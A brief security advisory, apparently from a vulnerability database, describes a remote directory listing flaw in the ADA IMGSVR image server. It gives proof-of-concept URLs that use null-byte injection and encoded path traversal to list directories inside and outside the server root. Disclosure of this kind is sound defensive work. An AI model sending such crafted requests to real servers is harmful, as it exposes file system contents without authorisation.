|
|
ADA IMGSVR Remote Directory Listing Vulnerability
There is no exploit required to leverage this issue. The following proof of concept has been provided: For listing directories inside the server root (provided by Donato Ferrante): http://www.example.org:1234/%00/ http://www.example.org:1234/someDirectory%00/ http://www.example.org:1234/someDirectory/%00/ For listing directories outside of the server root (provided by Dr_insane): http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/ |
|
Privacy Statement |